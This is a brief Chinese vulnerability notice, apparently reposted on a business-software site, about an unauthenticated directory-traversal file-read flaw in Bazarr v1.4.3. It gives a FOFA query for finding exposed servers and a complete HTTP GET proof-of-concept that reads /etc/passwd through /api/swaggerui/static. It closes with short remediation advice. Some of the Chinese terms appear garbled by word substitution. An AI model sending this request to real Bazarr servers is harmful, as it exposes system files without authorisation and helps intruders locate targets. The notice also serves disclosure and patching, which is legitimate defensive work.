0x01 产物简介
Bazarr是Sonarr和Radarr的配套应用步伐,可根据您的要求管理和下载字幕。
0x02 弊端概述
Bazarr存在恣意文件读取弊端,该弊端是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可使用该弊端实验目录遍历。
0x03 复现环境
FOFA:title="Bazarr"
0x04 弊端复现
PoC
- GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
- Host:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Connection: close
0x05 修复建议
关闭互联网袒露面或接口设置访问权限
升级至安全版本
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
